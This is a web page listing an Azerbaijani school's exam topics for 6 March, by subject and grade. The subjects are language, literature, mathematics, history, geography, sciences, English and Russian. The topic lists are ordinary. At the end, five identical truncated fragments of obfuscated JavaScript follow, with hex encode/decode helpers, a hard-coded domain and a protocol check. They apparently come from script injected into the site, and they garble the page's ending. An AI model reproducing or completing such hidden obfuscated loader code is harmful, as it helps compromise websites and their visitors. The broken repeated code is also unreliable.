MQT-6 MÖVZULARI – 06 MART AZƏRBAYCAN DİLİ

 

MQT-6IX sinif

1. Fonetika

2. Leksika

3. Söz yaradıcılığı. Sözün tərkibi

4. Morfologiya – İsim, sifət, say, əvəzlik

5. Feil

6. Köməkçi nitq hissələri.

X sinif

1. Fonetika

2. Leksika

3. Söz yaradıcılığı. Sözün tərkibi

4. Morfologiya – İsim, sifət, say, əvəzlik, zərf.  feil

5. Köməkçi nitq hissələri

6. Sintaksis, ismi və feili birləşmələr.

XI sinif və Məzun

1. Fonetika

2. Leksika

3. Söz yaradıcılığı. Sözün tərkibi

4. Morfologiya – İsim, sifət, say, əvəzlik, zərf, feil

5. Köməkçi nitq hissələri

6. Sintaksis (Söz birləşmələri, sintaktik əlaqələr)

7. Cümlə üzvləri.

8. Həmcins üzvlər, cümlə üzvünün əlavəsi, Mübtəda və xəbərin uzlaşması, ara sözlər və xitab, söz cümlə.

9. Sadə cümlənin şəxsə görə növləri.

 ƏDƏBİYYAT

IX sinif

1. Təkrar.

2. Yeni dövr Azərbaycan ədəbiyyatı (I mərhələ).

3. “Koroğlu” eposu. “Keçəl Həmzənin Qıratı qaçırması” qolu.

4. M.P.Vaqifin həyatı və yaradıcılığı. “Bəri bax” qoşması, “Görmədim” müxəmməsi.

5.  Ədəbiyyat nəzəriyyəsi: Vəznlər. Müxəmməs, təxmis, beşlik.

X sinif

1. Təkrar.

2. Yeni dövr Azərbaycan ədəbiyyatı (I mərhələ).

3.  “Koroğlu” eposu. “Keçəl Həmzənin Qıratı qaçırması” qolu.

4. M.P.Vaqifin həyatı və yaradıcılığı. “Bəri bax” qoşması, “Görmədim” müxəmməsi.

5.  Ədəbiyyat nəzəriyyəsi: Vəznlər. Müxəmməs, təxmis, beşlik.

XI sinif və Məzun

1. Təkrar.

2.  “Ananmın kitabı” tragikomediyası.

3.  M.Ə.Sabirin həyatı və yaradıcılığı. “Amalımız,əfkarımız ifnayi-vətəndir” müxəmməsi, “Səttarxana” müsəddəsi.

4. H.Cavidin həyatı və yaradıcılığı. “İblis” faciəsi

5. C.Cabbarlının həyatı və yaradıcılığı. “Oqtay Eloğlu” faciəsi.

CƏBR-HƏNDƏSƏ

IX  sinif  1-2-3-4-cü  qruplar

1.  Kvadrat köklər.

2.  Fiqurların  sahəsi

3.  Təkrar

X sinif  1-2-3-4-cü qruplar

1.  Kvadrat köklər.

2.  Fiqurların  sahəsi

3.  Təkrar

XI sinif  və Məzun 1-2-ci qruplar

1. Tirqonometik  tənliklər

2.  Kompleks  ədədlər

3.  Vektorlar

4.  Təkrar

XI sinif və Məzun 3-4-cü qruplar

1.   Silsilələr

2.   Funksiya  və  qrafiklər

3.   Fiqurların  sahəsi

4.   Hərəkət  oxşarlıq. Simmetriya

5.  Təkrar

TARİX

IX  sinif  II  qrup                                              

Təkrar, Eldənizlər, İntibah mədəniyyəti, Azərbaycana Monqolların və Cəlaləddinin hücumu, Hülakülər dövləti.

IX   sinif  III  qrup

Təkrar, Eldənizlər, İntibah mədəniyyəti, Azərbaycana Monqolların  və Cəlaləddinin hücumu. Hülakülər dövləti. Qızıl Ordu dövləti. Şərqi Avropa xalqları. Osmanlı dövləti. Teymurilər dövləti.

X  sinif  II  qrup                                              

Təkrar, Eldənizlər, İntibah mədəniyyəti, Azərbaycana Monqolların və Cəlaləddinin hücumu, Hülakülər dövləti. Toxtamışın və Teymurun Azərbaycana hücumu. Şirvanşahlar dövləti, Şəki hakimliyi.

X   sinif  III  qrup

Təkrar, Azərbaycan XII-XIV əsrlərdə. Osmanlı,Teymurilər dövləti, Səlib yürüşləri, İngiltərə və Fransa.

 XI  Sinif  və Məzun  II  QRUP                                              

Təkrar, Səfəvilər dövləti XVII-XVIII əsrlərdə.Azərbaycan Nadir şah imperiyasının tərkibində. Azərbaycan XXI əsrin başlanğıcında.

XI   Sinif və Məzun  III  QRUP

Təkrar,Səfəvilər dövləti XVII-XVIII əsrlərdə.Azərbaycan Nadir şah imperiyasının tərkibində. Osmanlı dövləti, Böyük Moğol dövləti, Çin vəAvropa xalqları XVI-XVII əsrlərdə. Azərbaycan XXI əsrin başlanğıcında.

COĞRAFİYA

IX sinif

1.Plan və xəritə, Litosfer, Atmosfer, Hidrosfer, Biosfer. Avrasiya. Şimali Amerika

X sinif

1. Plan və xəritə, Litosfer, Atmosfer, Hidrosfer, Biosfer. Materiklər və okeanlar coğrafiyası
2. Azərbaycan Respubliksının fiziki coğrafiyası (A.R – nın fiziki coğrafi vilayetlerine qeder)

XI sinif və Məzun

1. Plan və xəritə, Litosfer, Atmosfer, Hidrosfer, Biosfer. Materiklər və okeanlar coğrafiyası
2. Azərbaycan Respubliksının fiziki coğrafiyası
3. Azərbaycan Respublikasının iqtisadi və sosial coğrafiyası (A,R – nın iqtisadi – cografi rayonlarina qeder)

FİZİKA

IX sinif                                                             

1. Termodinamikanın əsasları.

2. Təkrar mövzular.                                               

 X sinif

  1. Doymuş və doymamış buxar.

2. Təkrar mövzular.

 XI sinif və Məzun

1. Sabit cərəyan qanunları.

2. Müxtəlif mühitlərdə elektrik cərəyanı.

3. Təkrar mövzular.

KİMYA

IX sinif

Təkrar

Elektroliz

Oksigen. Ozon.

Hidrogen. Su

VII qrupunəsasyarımqrupelementləri. Xlor.

X sinif

Təkrar

VII qrupun əsas yarımqrup elementləri. Xlor.

Kükürd. Hidrogen-sulfid.

Kükürdoksidləri. Sulfatturşusu

Azot. Ammonyak. Ammonium duzları.

XI sinif və Məzun

Təkrar

Metallarınümumixarakteristikaları. I qrupmetalları. II qrupmetalları. Suyuncodluğu. Alüminium.

Dəmir və onun birləşmələri. Polad. Çuqun. Mis. Sink. Xrom

Alkanlar. Tsikloalkanlar

Alkenlər. Alkadienlər

BİOLOGİYA

IX sinif

Buğumayaqlılar tipi, dərisitikanlılar,xordalılar(neştərçə,minoqa)

TƏKRAR mövzular

X  sinif

Quşlar,məməlilər,heyvanlar aləminin təkamülü,insan orqanizmi ilə ümumi tanışlıq,sinir sistemi,vəzilər

Təkrar  mövzular

XI sinif və Məzun

Birhüceyrəli heyvanlar,bağırsaqboşluqlular,yastı qurdlar,sap qurdlar,həlqəvi qurdlar,molyuskalar,xərçənglər,hörümçəklər.

Təkrar mövzular

 İNGİLİS DİLİ

IX sinif

1. The Noun

2. The Article

3. Quantifiers

4. The Pronoun

5. The Numeral

6. The Adjective and adverb

7. The Preposition

8. The Verb (regular and irregular verbs)

9. Complex Object

X sinif

1. The Noun

2. The Article

3. Quantifiers

4. The Pronoun

5. The Numeral

6. The Adjective and adverb

7. The Preposition

8. The Verb (regular and irregular verbs)

9. Complex Object

10. Tense forms (Present Simple, Past Simple, Future Simple, Future in the Past)

XI sinif və Məzun

1. The Noun

2. The Article

3. Quantifiers

4. The Pronoun

5. The Numeral

6. The Adjective and adverb

7. The Preposition

8. The Verb

9. Complex Object

10. Tense forms

11. Modal Verbs

RUS DİLİ (Azərbaycan bölməsi)

1.Фонетика

2.Лексикология.Синонимы. Антонимы. Фразеологизмы. Пословицы.

3.Морфология. Имя существительное. Имя прилагательное.

4.Местоимение. Имя числительное.

5.Глагол(виды, спряжение и время глагола).

6. Наречие. Разряды наречий по значению.

7.Служебные части речи. Предлог(значение предлогов).

8.Перевод. Диалог.

9.Работа над текстом. 

Темы для ТТО 6 по русскому языку.

 1. Фонетика
  2. Лексикология
  3. Фразеология
  4. Орфография
  5. Морфология
  6. -Н-НН- в различных частях речи
  7. Синтаксис (словосочетание, простое предложение)

Темы для ТТО 6 по литературе.

1. Литература XIX века
2. А.И.Куприн
3. И.А.Бунин
4. М.Горький
5. М.Ф.Ахундов
6. Н.Везиров
7. Дж.Мамедкулизаде
8. Сопоставительные тесты
9. Стихи наизусть

 

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “hedef.edu.az”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “hedef.edu.az”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “hedef.edu.az”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “hedef.edu.az”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “hedef.edu.az”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e